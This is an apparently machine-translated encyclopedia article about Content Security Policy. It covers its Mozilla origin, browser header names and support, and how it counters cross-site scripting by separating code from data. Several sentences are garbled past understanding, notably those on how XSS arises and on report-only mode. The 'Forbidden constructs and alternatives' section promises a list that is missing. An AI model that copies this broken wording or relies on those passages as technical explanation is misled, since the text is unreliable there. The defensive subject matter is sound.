Content Security Policy
Content Security Policy (CSP ) is a security concept to prevent cross-site scripting and other attacks by introduction of data in web pages .. It is a W3C Working Draft for security of Web applications.
CSP was originally designed by the Mozilla Foundation and supported in Firefox 4.0 for the first time experimentally.
Status
The official name of the header field is Content - Security - Policy. Mozilla Firefox supports this from version 23 Google Chrome since version 25
The pre-release version of Internet Explorer uses the name X-Content - Security - Policy. Older versions of Google Chrome (2011) and other WebKit browser (Safari ) use X - WebKit -CSP. The support of the draft in Firefox and Chrome is almost complete.
Currently, part of the W3C version 1.1 in preparation
Problem of classical security concept
Web pages can contain active content, for example in the form of JavaScript code. If the Web browser execute this code, they enforce the same- origin policy. This means that code from a source not allowed to access contents of another source. Thus, for example, must not access the elements of an online banking website of the code in the web page of an attacker.
In practice, however, cross-site scripting vulnerabilities are very common, so that the same- origin policy is undermined. A cross-site scripting vulnerability arises when can foist by faulty masking code a website. From the perspective of the browser this spurious code comes from the same source as the impugned website.
Operation
Concept
The cause of cross-site scripting vulnerabilities lies in the faulty dynamic content generation in web application. The Content Security Policy therefore enforces a strict separation between content data in the HTML code and external files with JavaScript code. In general, the JavaScript code is static and is not dynamically generated.
Forbidden constructs and alternatives
The separation between code and data is achieved as follows:
Evaluation, reporting
To test the effects of enabling the CSP for a web application without the CSP enforce but even sees the W3C draft a possibility of injury to the CSP on the log on report- uri specified URL. To this end, the report only mode must be used by Content Security Policy -Report -Only header.